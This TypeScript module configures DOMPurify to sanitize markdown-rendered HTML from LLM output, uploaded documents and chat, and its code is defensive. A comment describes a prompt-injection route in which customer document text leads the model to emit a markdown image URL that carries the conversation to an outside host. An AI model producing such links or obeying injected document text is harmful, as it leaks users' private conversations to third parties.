import DOMPurify from 'dompurify'
import type { Config as DOMPurifyConfig } from 'dompurify'

// marked passes raw HTML through, and its output either goes on screen via v-html
// (`Markdown.vue`) or onto the clipboard for another app to render (« Copier » on a
// suggested content, MYAC-1621) — so sanitize it to prevent stored XSS from untrusted
// content (LLM-generated run summaries, uploaded-doc text, chat, suggested wording).
// ADD_ATTR keeps target so the renderer's new-tab links still work.
//
// MYAC-1570 — nor may it make the browser fetch anything: text in a customer document can
// lead the model to write `![x](https://elsewhere/p.png?q=<conversation>)`, and the CSP
// image list includes Google's hosts (MYAC-1624). So every markup that loads a resource goes — images, media,
// SVG/MathML (html profile), CSS (`<style>`, `style=`), the legacy `background` — and
// forms with them. No front source writes any of these in markdown. `<button>` stays:
// the risk cards inject their citation chips as buttons (`riskHelpers.ts`), and with no
// form left a button submits nothing. `<input>` stays as a checkbox only (the hook below):
// it is how a GFM task list (`- [x] done`) shows its state.
const MARKDOWN_SANITIZE: DOMPurifyConfig = {
  USE_PROFILES: { html: true },
  ADD_ATTR: ['target'],
  FORBID_TAGS: ['img', 'picture', 'source', 'video', 'audio', 'track', 'style',
    'form', 'textarea', 'select'],
  FORBID_ATTR: ['style', 'background', 'srcset', 'poster'],
}

// Its own instance, so the hook does not reach the other DOMPurify callers.
const purifier = DOMPurify(window)
purifier.addHook('afterSanitizeAttributes', (node) => {
  // Every link, the raw `<a>` the renderer never saw included: the page it opens gets
  // neither `window.opener` nor this page's address.
  if (node.tagName === 'A' && node.hasAttribute('href')) node.setAttribute('rel', 'noopener noreferrer')
  // A task-list checkbox shows a state, nobody ticks it; any other input (an image
  // input loads its `src`) goes.
  if (node.tagName === 'INPUT') {
    if (node.getAttribute('type')?.toLowerCase() === 'checkbox') node.setAttribute('disabled', '')
    else node.remove()
  }
})

/** The one sanitizer for HTML rendered from markdown, wherever that HTML goes. */
export function sanitizeMarkdownHtml(html: string): string {
  return purifier.sanitize(html, MARKDOWN_SANITIZE)
}
